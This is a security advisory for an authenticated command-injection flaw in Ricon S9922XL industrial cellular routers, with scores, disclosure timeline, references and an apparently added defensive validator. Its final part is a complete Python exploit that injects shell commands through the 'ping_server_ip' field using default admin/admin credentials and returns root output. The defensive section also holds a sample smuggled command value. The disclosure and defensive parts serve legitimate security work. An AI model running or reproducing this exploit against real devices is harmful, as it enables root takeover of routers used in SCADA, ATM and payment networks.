Ricon Industrial Cellular Router S9922XL Remote Command Execution

2021-07-04 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS2: 10 High
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 10 High (Confidence: High)
EPSS: 0.002 Low (Percentile: 52.7%)

Title: Ricon Industrial Cellular Router S9922XL Remote Command Execution
Advisory ID: ZSL-2021-5653
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 04.07.2021

Summary

The S9922L series LTE router is designed and manufactured by Ricon Mobile Inc. It is based on 3G/LTE cellular network technology with industrial-class quality. With its embedded cellular module, it is widely used in multiple cases such as ATM connection, remote office security connection, data collection, etc.

The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi and VPN technologies. It has a powerful 64-bit processor and an integrated real-time operating system specially developed by Ricon Mobile. The S9922XL is widely used in many areas such as intelligent transportation, SCADA, POS, industrial automation, telemetry, finance and environmental protection.

Description

The router suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the admin (root) user via the 'ping_server_ip' POST parameter. The device is also vulnerable to Heartbleed.
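
An added defensive example (not part of the original advisory or the vendor's firmware): an allow-list check for a ping-target field such as 'ping_server_ip', and a scan of request records for netTest submissions to /apply.cgi whose value fails that check. The record tuple shape, the function names and the sample data are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# One RFC 1123 hostname label: letters, digits, inner hyphens only.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

def is_valid_ping_target(value):
    """Allow-list: accept only an IP literal or an RFC 1123 hostname."""
    if "%" not in value:  # refuse IPv6 zone IDs, which can carry arbitrary text
        try:
            ipaddress.ip_address(value)
            return True
        except ValueError:
            pass
    if not value or len(value) > 253:
        return False
    return all(_LABEL.fullmatch(label) for label in value.split("."))

def flag_nettest_posts(records):
    """Return (source, value) for netTest posts whose ping target is rejected.

    records: iterable of (source_ip, path, urlencoded_body) tuples, an assumed
    shape for request data exported from a reverse proxy or WAF.
    """
    hits = []
    for src, path, body in records:
        if path.split("?", 1)[0] != "/apply.cgi":
            continue
        form = parse_qs(body, keep_blank_values=True)
        if form.get("submit_button") != ["netTest"]:
            continue
        for value in form.get("ping_server_ip", []):
            if not is_valid_ping_target(value):
                hits.append((src, value))
    return hits

# Constructed sample records (not captured traffic); "otherPage" is made up.
SAMPLE = [
    ("10.0.0.5", "/apply.cgi", "submit_button=netTest&is_ping=0&ping_server_ip=8.8.8.8"),
    ("10.0.0.9", "/apply.cgi", "submit_button=netTest&is_ping=0&ping_server_ip=%3Bid"),
    ("10.0.0.5", "/apply.cgi", "submit_button=netTest&is_ping=0&ping_server_ip=ntp.example.org"),
    ("10.0.0.7", "/apply.cgi", "submit_button=otherPage&action=Apply"),
]

if __name__ == "__main__":
    for src, value in flag_nettest_posts(SAMPLE):
        print(f"rejected ping_server_ip from {src}: {value!r}")
```

The check rejects by default: anything that is not an address or hostname fails, which is more robust than trying to enumerate shell metacharacters.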

Vendor

Ricon Mobile Inc. - <https://www.riconmobile.com>

Affected Version

Model: S9922XL and S9922L
Firmware: 16.10.3

Tested On

GNU/Linux 2.6.36 (mips)
WEB-ROUTER

Vendor Status

[02.07.2021] Vulnerability discovered.
[02.07.2021] Vendor contacted.
[03.07.2021] No response from the vendor.
[04.07.2021] Public security advisory released.
[07.03.2022] Vendor releases version 16.10.3 (4360) to address this issue.

PoC

ricon_cmdinj.py

Credits

Vulnerability discovered by Gjoko Krstic

References

[1] <https://www.exploit-db.com/exploits/50096>
[2] <https://packetstormsecurity.com/files/163390/>
[3] <https://cxsecurity.com/issue/WLB-2021070038>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/204901>
[5] <https://www.cisa.gov/uscert/ics/advisories/icsa-22-032-01>
[6] <https://nvd.nist.gov/vuln/detail/CVE-2022-0365>
[7] <https://vulners.com/cve/CVE-2022-0365>
[8] <https://riconmobile.com/blog/new-firmware-release-notification>
[9] <https://jvn.jp/vu/JVNVU93682644/>
[10] <https://www.isssource.com/hole-in-ricon-mobile-industrial-cellular-router/>

Changelog

[04.07.2021] - Initial release
[07.07.2021] - Added reference [1], [2], [3] and [4]
[01.02.2022] - Added reference [5], [6] and [7]
[07.03.2022] - Added vendor status and reference [8] and [9]
[08.09.2022] - Added reference [10]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Ricon Industrial Cellular Router S9922XL Remote Command Execution
#
#
# Vendor: Ricon Mobile Inc.
# Product web page: https://www.riconmobile.com
# Affected version: Model: S9922XL and S9922L
#                   Firmware: 16.10.3
#
# Summary: S9922L series LTE router is designed and manufactured by
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology
# with industrial class quality. With its embedded cellular module,
# it widely used in multiple case like ATM connection, remote office
# security connection, data collection, etc.
#
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi
# and VPN technologies. Powerful 64-bit Processor and integrated real-time
# operating system specially developed by Ricon Mobile. S9922XL is
# widely used in many areas such as intelligent transportation, scada,
# POS, industrial automation, telemetry, finance, environmental protection.
#
# Desc: The router suffers from an authenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary
# shell commands as the admin (root) user via the 'ping_server_ip' POST
# parameter. Also vulnerable to Heartbleed.
#
# --------------------------------------------------------------------
# C:\>python ricon.py 192.168.1.71 id
# uid=0(admin) gid=0(admin)
# --------------------------------------------------------------------
#
# Tested on: GNU/Linux 2.6.36 (mips)
#            WEB-ROUTER
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5653
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php
#
#
# 02.07.2021
#

import requests,sys,re

if len(sys.argv)<3:
    print("Ricon Industrial Routers RCE")
    print("Usage: ./ricon.py [ip] [cmd]")
    sys.exit(17)
else:
    ipaddr=sys.argv[1]
    execmd=sys.argv[2]

data={'submit_class'  :'admin',
      'submit_button' :'netTest',
      'submit_type'   :'',
      'action'        :'Apply',
      'change_action' :'',
      'is_ping'       :'0',
      'ping_server_ip':';'+execmd}

htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
reout=re.search("20\">(.*)",htreq.text,flags=re.S).group(1).strip('\n')
print(reout)
